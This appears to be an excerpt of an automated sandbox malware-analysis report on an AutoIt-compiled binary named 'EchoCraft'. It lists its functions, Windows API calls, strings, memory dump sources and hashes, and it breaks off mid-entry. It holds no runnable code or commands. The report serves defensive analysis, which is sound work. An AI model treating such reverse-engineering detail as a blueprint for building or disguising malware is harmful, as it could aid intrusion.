VirtualFree.KERNEL32(?,00000000,00008000), ref: 00AC4E59

Strings

close all, xrefs: 00A86412

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Free$DestroyLibrarySendStringUninitializeUnregisterVirtualWindow
String ID: close all
API String ID: 469580280-3243417748
Opcode ID: eb00dccd591b8b8a9b63554a0ab462015afa587ca3b9a1db71c0e4a708464453
Instruction ID: 983d82bac8f154bb260939031ca52de119c4370ac653b9949429457b4d5b4369
Opcode Fuzzy Hash: eb00dccd591b8b8a9b63554a0ab462015afa587ca3b9a1db71c0e4a708464453
Instruction Fuzzy Hash: 34D13B31701212CFDB29EF54C995F69F7A4BF08704F6642ADE94A6B251CB30AC52CF84

Function 00AB9165 Relevance: 13.8, APIs: 9, Instructions: 300
COMMONLIBRARYCODE

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fe222b101bb7b8bb731e3c03f77a17de41a835e47cf425acd7b72c7517407c99
Instruction ID: 8fc7adc375ec640df154b731b314adba13e65abcfb7bae0e69e22bf388bc447d
Opcode Fuzzy Hash: fe222b101bb7b8bb731e3c03f77a17de41a835e47cf425acd7b72c7517407c99
Instruction Fuzzy Hash: 72C1B274D04349AFDB11DFA8D841BEEBBB8BF0A310F144599E615AB393CB349942CB61

Function 00A9B1EB Relevance: 12.9, APIs: 1, Strings: 6, Instructions: 671
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

Strings

d10m0, xrefs: 00A9B29D
d1b, xrefs: 00A9B302, 00A9B43B
d0b, xrefs: 00A9B243, 00A9B2BD, 00A9B454
i, xrefs: 00A9B650
d5m0, xrefs: 00A9B422
d1r0,2, xrefs: 00A9B256

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID:
String ID: d0b$d10m0$d1b$d1r0,2$d5m0$i
API String ID: 0-4285391669
Opcode ID: 4e3e7a55065efd58280221a67e27160fad250633e63d749509df6faebcd4280b
Instruction ID: 9bae9f7309657123bda51a62c3a48c89dcd2cd6086412485812defd307140b75
Opcode Fuzzy Hash: 4e3e7a55065efd58280221a67e27160fad250633e63d749509df6faebcd4280b
Instruction Fuzzy Hash: 3D625775609341DFC724DF14D184AAABBF0BF89304F1089AEE49A8B391DB74E945CF92

Function 00A83546 Relevance: 10.5, APIs: 4, Strings: 2, Instructions: 44
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(00000000,AutoIt v3,AutoIt v3,00CF0000,80000000,80000000,0000012C,00000064,00000000,00000000,00000000,00000001), ref: 00A83574
CreateWindowExW.USER32(00000000,edit,00000000,50B008C4,00000000,00000000,00000000,00000000,00000000,00000001,00000000), ref: 00A83595
ShowWindow.USER32(00000000,?,?,?,?,?,?,00A8292D,?), ref: 00A835A9
ShowWindow.USER32(00000000,?,?,?,?,?,?,00A8292D,?), ref: 00A835B2

Strings

AutoIt v3, xrefs: 00A8356C, 00A83571, 00A83572
edit, xrefs: 00A8358F

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Window$CreateShow
String ID: AutoIt v3$edit
API String ID: 1584632944-3779509399
Opcode ID: 646eb8fdef956f6d224eb958602662fe227c6456e8619d145527e72f7ab22eb8
Instruction ID: dbf6477cb62d69652bba70d8017ee8da06711a35da6d8e6b666abbac3414b3fc
Opcode Fuzzy Hash: 646eb8fdef956f6d224eb958602662fe227c6456e8619d145527e72f7ab22eb8
Instruction Fuzzy Hash: CFF0B7719413907EEA2117276C08F772EBDD7CBF51B44409AB904A71B0CAA91850DAB4

Function 00AF1049 Relevance: 9.1, APIs: 6, Instructions: 100
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

InterlockedExchange.KERNEL32(?,000001F5), ref: 00AF1060
ReadFile.KERNELBASE(0000FFFF,00000000,0000FFFF,?,00000000), ref: 00AF1097
EnterCriticalSection.KERNEL32(?), ref: 00AF10B3
LeaveCriticalSection.KERNEL32(?), ref: 00AF112D
ReadFile.KERNEL32(0000FFFF,00000000,0000FFFF,00000000,00000000), ref: 00AF1142
InterlockedExchange.KERNEL32(?,000001F6), ref: 00AF1161

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CriticalExchangeFileInterlockedReadSection$EnterLeave
String ID:
API String ID: 3368777196-0
Opcode ID: bc84af1d877f127f1f312e72738129367fdd5d511c5bd24b6ef02a75af2aa036
Instruction ID: a6e6f87ed688393a1aa64fc06af5e1dccae64bf051d79241c3cd1e66a65654d9
Opcode Fuzzy Hash: bc84af1d877f127f1f312e72738129367fdd5d511c5bd24b6ef02a75af2aa036
Instruction Fuzzy Hash: 9E316171900205EBDF00EF94DD89EAE7778FF45710F1481A9FA00AB296DB70DA54CB64

Function 00A84C04 Relevance: 7.1, APIs: 2, Strings: 2, Instructions: 122
windowCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

LoadStringW.USER32(00000065,?,0000007F,00000104), ref: 00AC46C0

Part of subcall function 00A8B0DB: _wcslen.LIBCMT ref: 00A8B0EE

Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A84CF4

Strings

Line %d: , xrefs: 00AC473E
AutoIt - , xrefs: 00A84C68

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: IconLoadNotifyShell_String_wcslen
String ID: Line %d: $AutoIt -
API String ID: 2289894680-4094128768
Opcode ID: 422828b100c203d2f558d6b6c518f4224f913a72b93215bb40f9108b03e2440b
Instruction ID: c8ac49cab21faef88ca731d97a3cc9b84dbc6c55f9f57209243d844fbcbedd12
Opcode Fuzzy Hash: 422828b100c203d2f558d6b6c518f4224f913a72b93215bb40f9108b03e2440b
Instruction Fuzzy Hash: 6841BC715093016EC711FB20DD41FEF77ECAF99310F040A2AF588931A1EB30AA49C796

Function 00A8529A Relevance: 7.1, APIs: 3, Strings: 1, Instructions: 58
registryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

RegOpenKeyExW.KERNELBASE(80000001,Control Panel\Mouse,00000000,00000001,00000000,?,?,80000001,80000001,?,00A8528D,SwapMouseButtons,00000004,?), ref: 00A852BE
RegQueryValueExW.KERNELBASE(00000000,00000000,00000000,00000000,?,?,?,?,?,80000001,80000001,?,00A8528D,SwapMouseButtons,00000004,?), ref: 00A852DF
RegCloseKey.KERNELBASE(00000000,?,?,?,80000001,80000001,?,00A8528D,SwapMouseButtons,00000004,?), ref: 00A85301

Strings

Control Panel\Mouse, xrefs: 00A852BC

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CloseOpenQueryValue
String ID: Control Panel\Mouse
API String ID: 3677997916-824357125
Opcode ID: 107c771dedc2eac68e6473b5758659187d4bb5e7c44ebf6d48f8cd822a543b52
Instruction ID: ef309b540cdb337957700e534f6970135aa9a751f8c92e6a94a3de6a7c8a7dc8
Opcode Fuzzy Hash: 107c771dedc2eac68e6473b5758659187d4bb5e7c44ebf6d48f8cd822a543b52
Instruction Fuzzy Hash: FC113C75A10618FFDB219FB4DC84DEEBBB8EF04744F108459B805D7110E671DE459B60

Function 00A8F220 Relevance: 6.7, APIs: 2, Strings: 1, Instructions: 1414COMMON

Download Yara Rule

Strings

Variable must be of type 'Object'., xrefs: 00AD4D95

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID:
String ID: Variable must be of type 'Object'.
API String ID: 0-109567571
Opcode ID: d66a3c4f48205ee7c86a320e197e0dfd284c52498e0fa9fe052d5ae458c6ef29
Instruction ID: 4d4362b37ef635898612e1cf6251304dea8f91ffb6e470584106a98eb85f95e1
Opcode Fuzzy Hash: d66a3c4f48205ee7c86a320e197e0dfd284c52498e0fa9fe052d5ae458c6ef29
Instruction Fuzzy Hash: A4C26C75E00206CFCB24EF58C980AADB7F1FF19710F248169E956AB3A1E775AD41CB90

Function 00AA01FB Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 43COMMON

Download Yara Rule

APIs

__CxxThrowException@8.LIBVCRUNTIME ref: 00AA0A88

Part of subcall function 00AA36C4: RaiseException.KERNEL32(?,?,?,00AA0AAA,?,?,?,?,?,?,?,?,00AA0AAA,?,00B496A0), ref: 00AA3724

__CxxThrowException@8.LIBVCRUNTIME ref: 00AA0AA5

Strings

Unknown exception, xrefs: 00AA0AB2

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Exception@8Throw$ExceptionRaise
String ID: Unknown exception
API String ID: 3476068407-410509341
Opcode ID: cbb3b89adec5ddd9e3a582331ac0708de94f4011cfe7c1cc894437598ba7106d
Instruction ID: 11b0db070f0ca1fdad5be0c4409e59ec6896b8594a4e9c8cfca2b6b574969f8a
Opcode Fuzzy Hash: cbb3b89adec5ddd9e3a582331ac0708de94f4011cfe7c1cc894437598ba7106d
Instruction Fuzzy Hash: BCF0C23490030DB78F01FBB4E956EDF77AC5A03350BA04160B924975E2FB70EE5985C0

Function 00B086CB Relevance: 4.9, APIs: 3, Instructions: 430COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(00000000,00000067,000000FF,?,?,?), ref: 00B08A67
TerminateProcess.KERNEL32(00000000), ref: 00B08A6E
FreeLibrary.KERNEL32(?,?,?,?), ref: 00B08C4F

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Process$CurrentFreeLibraryTerminate
String ID:
API String ID: 146820519-0
Opcode ID: 88d4d405dd4af00e616b37d548fa452298f4b16d9eb3fe8dfa8d5b75d84843aa
Instruction ID: a7d96f7fa44050715f6a7633305f3dc27b65ab98209d9197091fee14d8a40ace
Opcode Fuzzy Hash: 88d4d405dd4af00e616b37d548fa452298f4b16d9eb3fe8dfa8d5b75d84843aa
Instruction Fuzzy Hash: D0127D71A083419FC724DF28C584B6ABBE5FF84314F14899DE8898B392DB31E945CB92

Function 00B09808 Relevance: 4.7, APIs: 3, Instructions: 233COMMON

Download Yara Rule

APIs

_wcslen.LIBCMT ref: 00B0989C
_strcat.LIBCMT ref: 00B098DB
_wcslen.LIBCMT ref: 00B09929

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: _wcslen$_strcat
String ID:
API String ID: 306214811-0
Opcode ID: b219018d6e6e2901b865111e815cc6d01b9bc67d10fdb20dbac5a173fbd95f9e
Instruction ID: 325d995ae45bf7662931b204a86ee426dd39aab4bfc8136f5b62d27ef4d5d75a
Opcode Fuzzy Hash: b219018d6e6e2901b865111e815cc6d01b9bc67d10fdb20dbac5a173fbd95f9e
Instruction Fuzzy Hash: 25A11931604605EFCB18EF58C6D1969BBE1FF46354B2484ADE85A8F792DB31ED42CB80

Function 00A838E2 Relevance: 4.7, APIs: 3, Instructions: 152comCOMMON

Download Yara Rule

APIs

Part of subcall function 00A83700: MapVirtualKeyW.USER32(0000005B,00000000), ref: 00A83731
Part of subcall function 00A83700: MapVirtualKeyW.USER32(00000010,00000000), ref: 00A83739
Part of subcall function 00A83700: MapVirtualKeyW.USER32(000000A0,00000000), ref: 00A83744
Part of subcall function 00A83700: MapVirtualKeyW.USER32(000000A1,00000000), ref: 00A8374F
Part of subcall function 00A83700: MapVirtualKeyW.USER32(00000011,00000000), ref: 00A83757
Part of subcall function 00A83700: MapVirtualKeyW.USER32(00000012,00000000), ref: 00A8375F

Part of subcall function 00A83768: RegisterWindowMessageW.USER32(00000004,?,00A83AB3), ref: 00A837C0

GetStdHandle.KERNEL32(000000F6,00000000,00000000), ref: 00A83B54
OleInitialize.OLE32 ref: 00A83B72
CloseHandle.KERNELBASE(00000000,00000000), ref: 00AC3F42

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Virtual$Handle$CloseInitializeMessageRegisterWindow
String ID:
API String ID: 1986988660-0
Opcode ID: d11736c0b6a62f8f84fce57f824bd6cd0fe2533deedc22c6c49c706fb59cfae1
Instruction ID: 34eff99c1daac2c55064cc1623c8f2a15a076d47faac016efbcbf267ec0ac19c
Opcode Fuzzy Hash: d11736c0b6a62f8f84fce57f824bd6cd0fe2533deedc22c6c49c706fb59cfae1
Instruction Fuzzy Hash: AA719AB2A123008ED789EF79B9667557BE0FB6A30271481EAE50AC7361FF704945CF50

Function 00A9FD8B Relevance: 4.6, APIs: 3, Instructions: 75timewindowCOMMON

Download Yara Rule

APIs

Part of subcall function 00A84C04: Shell_NotifyIconW.SHELL32(00000001,?), ref: 00A84CF4

KillTimer.USER32(?,00000001,?,?), ref: 00A9FE14
SetTimer.USER32(?,00000001,000002EE,00000000), ref: 00A9FE23
Shell_NotifyIconW.SHELL32(00000001,000003A8), ref: 00ADFD62

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: IconNotifyShell_Timer$Kill
String ID:
API String ID: 3500052701-0
Opcode ID: 5d36309ee2531ad0bfde319700c96a7168ade1a4dd3574b2a7aeec8fcd892710
Instruction ID: 24420302410ec0dc16b3e3e3fdd6f8cf93a738c66f2de2c671d58c5e2c3fc9e5
Opcode Fuzzy Hash: 5d36309ee2531ad0bfde319700c96a7168ade1a4dd3574b2a7aeec8fcd892710
Instruction Fuzzy Hash: E8319370A04354AFEB22CF248885BE7BBFDAB02308F1444AED5DB97241C7741A85CB51

Function 00AB8ACE Relevance: 4.6, APIs: 3, Instructions: 61COMMONLIBRARYCODE

Download Yara Rule

APIs

CloseHandle.KERNELBASE(00000000,00000000,?,?,00AB89EC,?,00B49C30,0000000C), ref: 00AB8B24
GetLastError.KERNEL32(?,00AB89EC,?,00B49C30,0000000C), ref: 00AB8B2E
__dosmaperr.LIBCMT ref: 00AB8B59

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CloseErrorHandleLast__dosmaperr
String ID:
API String ID: 2583163307-0
Opcode ID: 4b4720d0354c36978e6a11493d6232b160f99b24e3f7873b6cbed088062ec040
Instruction ID: 2018406651601c5ea39dac316b8fdd0e2386fc6d56b2b60badd170d67df114ee
Opcode Fuzzy Hash: 4b4720d0354c36978e6a11493d6232b160f99b24e3f7873b6cbed088062ec040
Instruction Fuzzy Hash: 84016632B017609BD224333DA985BFEA74E9B82734F3A090EF8148B0C3DE288CC1C251

Function 00AB97AB Relevance: 4.6, APIs: 3, Instructions: 50COMMONLIBRARYCODE

Download Yara Rule

APIs

SetFilePointerEx.KERNELBASE(00000000,00000000,00000002,FF8BC369,00000000,FF8BC35D,00000000,1875FF1C,1875FF1C,?,00AB985A,FF8BC369,00000000,00000002,00000000), ref: 00AB97E4
GetLastError.KERNEL32(?,00AB985A,FF8BC369,00000000,00000002,00000000,?,00AB5F81,00000000,00000000,00000000,00000002,00000000,FF8BC369,00000000,00AA6FF1), ref: 00AB97EE
__dosmaperr.LIBCMT ref: 00AB97F5

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: ErrorFileLastPointer__dosmaperr
String ID:
API String ID: 2336955059-0
Opcode ID: c279f17761b9e813071324dd8ab5c8d8f80b1d124aee0578b7d278b760668078
Instruction ID: a37c0979283c68d63f719ce97ab65a4e11b8092ad118888228c4e190573069d0
Opcode Fuzzy Hash: c279f17761b9e813071324dd8ab5c8d8f80b1d124aee0578b7d278b760668078
Instruction Fuzzy Hash: 0801FC33620618ABCB059F99DC05DEF7B6EEF86330B240249F9159B191EE71DD9187A0

Function 00A8E098 Relevance: 4.5, APIs: 3, Instructions: 29windowsleepCOMMON

Download Yara Rule

APIs

TranslateMessage.USER32(?), ref: 00A8E0DB
DispatchMessageW.USER32(?), ref: 00A8E0E9
PeekMessageW.USER32(?,00000000,00000000,00000000,00000001), ref: 00A8E0FF
Sleep.KERNEL32(0000000A), ref: 00A8E111
TranslateAcceleratorW.USER32(?,?,?), ref: 00AD2B6F

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: Message$Translate$AcceleratorDispatchPeekSleep
String ID:
API String ID: 3288985973-0
Opcode ID: 1c06c81cc195f1c18ca1f7aa24bfcc84449737394078cb6243fb21568eb03370
Instruction ID: fbf52e8549d448ca456f0ec6dbf67047fb089a9eae0f31bfb32b0832748b39b3
Opcode Fuzzy Hash: 1c06c81cc195f1c18ca1f7aa24bfcc84449737394078cb6243fb21568eb03370
Instruction Fuzzy Hash: 84F05E30245385DAEB34DBA0DC49FDA73E8EF85305F504A29E65AC30D0DF709488DB16

Function 00AF0BCB Relevance: 4.5, APIs: 3, Instructions: 21COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(0000002C,00000000,?,00000002,00000000,?,00AF09C0,00000000,?,00000000,?,00AC3F35,00000000), ref: 00AF0BE1
GetCurrentProcess.KERNEL32(?,00000000,?,00AF09C0,00000000,?,00000000,?,00AC3F35,00000000), ref: 00AF0BE9
DuplicateHandle.KERNELBASE(00000000,?,00AF09C0,00000000,?,00000000,?,00AC3F35,00000000), ref: 00AF0BF0

Memory Dump Source

Source File: 00000012.00000002.1801293064.0000000000A81000.00000020.00000001.01000000.00000008.sdmp, Offset: 00A80000, based on PE: true

Associated: 00000012.00000002.1801277484.0000000000A80000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B1D000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801339986.0000000000B43000.00000002.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801377787.0000000000B4D000.00000004.00000001.01000000.00000008.sdmpDownload File
Associated: 00000012.00000002.1801392801.0000000000B55000.00000002.00000001.01000000.00000008.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_18_2_a80000_EchoCraft.jbxd

Similarity

API ID: CurrentProcess$DuplicateHandle
String ID:
API String ID: 1294930198-0
Opcode ID: 0aeed032dfc529cb95bacc8bef0fcc04a15509b4f6f75d82e438983d69826b57
Instruction ID: 3a4cfaca8d3c2c1437df3ba705ced4c6d19256a1494386cc7bfc1042f071ec60
Opcode Fuzzy Hash: 0aeed032dfc529cb95bacc8bef0fcc04a15509b4f6f75d82e438983d69826b57
Instruction Fuzzy Hash: 82D05E7618030ABBC7111BE5EC09FBB7B7DDBC6B6BF508019FB0597151CEB484009625

Function 00AF0A09 Relevance: 4.5, APIs: 3, Instructions: 17COMMON

Download Yara Rule

APIs

Part of subcall function 00AF11AF: InterlockedExchange.KERNEL32(?,?), ref: 00AF11BF
Part of subcall function 00AF11AF: EnterCriticalSection.KERNEL32(00000000,?), ref: 00AF11D1
Part of subcall function 00AF11AF: TerminateThread.KERNEL32(00000000,000001F6), ref: 00AF11DF
